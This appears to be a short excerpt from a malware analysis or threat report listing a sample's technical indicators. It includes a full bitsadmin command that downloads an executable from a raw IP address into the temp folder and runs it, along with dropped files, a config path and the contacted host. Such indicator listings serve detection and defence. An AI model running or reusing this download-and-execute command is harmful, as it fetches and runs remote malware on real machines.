Technical Information
- '<SYSTEM32>\bitsadmin.exe' /transfer Update /download /priority FOREGROUND http://103.38.236.46/ntpvip.exe %TEMP%\ntpvip.exe'
- '%TEMP%\ntpvip.exe''
- %TEMP%\bit53ba.tmp
- %APPDATA%\mydata\datalogs.conf
- %TEMP%\bit53ba.tmp
- from %TEMP%\bit53ba.tmp to %TEMP%\ntpvip.exe'
- '10#.#8.236.46':80
- http://10#.#8.236.46/ntpvip.exe